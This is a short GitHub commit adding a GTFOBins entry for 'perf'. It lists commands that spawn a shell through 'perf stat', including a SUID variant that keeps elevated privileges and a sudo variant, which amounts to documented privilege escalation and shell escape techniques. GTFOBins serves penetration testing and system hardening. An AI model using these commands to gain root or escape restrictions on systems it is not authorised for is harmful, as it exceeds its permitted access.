Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
This commit is contained in:
Kiran Ghimire
2021-10-27 01:33:59 +05:45
committed by GitHub
parent 04b2874819
commit a981bc1968

12
_gtfobins/perf.md Normal file
View File

@@ -0,0 +1,12 @@
---
functions:
shell:
- code: |
perf stat /bin/sh
suid:
- code: |
./perf stat /bin/sh -p
sudo:
- code: |
sudo perf stat /bin/sh
---